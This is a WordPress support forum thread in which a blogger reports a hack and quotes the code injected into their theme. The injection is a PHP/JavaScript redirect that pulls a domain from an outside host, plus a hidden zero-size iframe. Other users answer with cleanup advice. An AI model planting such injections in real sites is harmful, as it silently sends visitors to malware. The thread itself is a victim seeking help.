WordPress.org

Ready to get started?Download WordPress

Forums

Multiple WordPress blogs hacked (4 posts)

  1. mousewrites
    Member
    Posted 4 years ago #

    Hey, all.

    My site was hacked at 6 am this morning. I noticed a few other people (asking questions here), and it looks like they have the same problem.

    If you look in the 404 file, you'll find this

    <script>location='http://scan.<?php echo file_get_contents('http://borntobebest.biz/actual_domain.txt'); ?>/vista1/6/48017/';</script><?php get_header(); ?>

    As well as this in ALL of the index.php files (this i'm not 100% sure is hack related)

    <div id="content">
    	<div id="main">
    		<div class="content"><div class="cont-r"><div class="cont-l"><div class="cont-bot">
    			<div class="grad-hack"><div class="begin"></div>

    and

    <iframe src="http://davtraff.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

    My question is this: how the hell do I undo this? Do I need to scrub the PHP manually? I'm not even sure how to DO that. Can I just open them in notepad and take out the code?

    Yes, I've updated everything and changed all passwords, looked for weird plugins/widgets, and removed users. I'm afraid that the thing has wormed it's way in, though.

    I've put up at temp plain HTML file for now at steampunkwallpaper.com, just so nobody gets whatever the hack is pushing.

    Help?

  2. iridiax
    Member
    Posted 4 years ago #

    See:

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    Because it's multiple sites, scan your home computer for malware (some steal your FTP passwords) and also contact your web host (since it may be their shared server that was hacked).

  3. mousewrites
    Member
    Posted 4 years ago #

    Oh, it's multiple people's sites, not just mine. I saw a few other users reporting the same issue here today (showing the code in the 404, I mean.)

    Thank you for the links, I will work on it. I'm assuming from reading this that the best thing to do is to rip it all out and redo it, vs editing the PHP, correct?

  4. iridiax
    Member
    Posted 4 years ago #

    the best thing to do is to rip it all out and redo it, vs editing the PHP, correct?

    Yes, just make sure that you have backed up your own files and any customized WordPress files. This way, you'll only have to check these few files.

    http://codex.wordpress.org/Upgrading_WordPress_Extended (see step 7)
    http://codex.wordpress.org/WordPress_Backups
    http://codex.wordpress.org/Backing_Up_Your_Database

Topic Closed

This topic has been closed to new replies.

About this Topic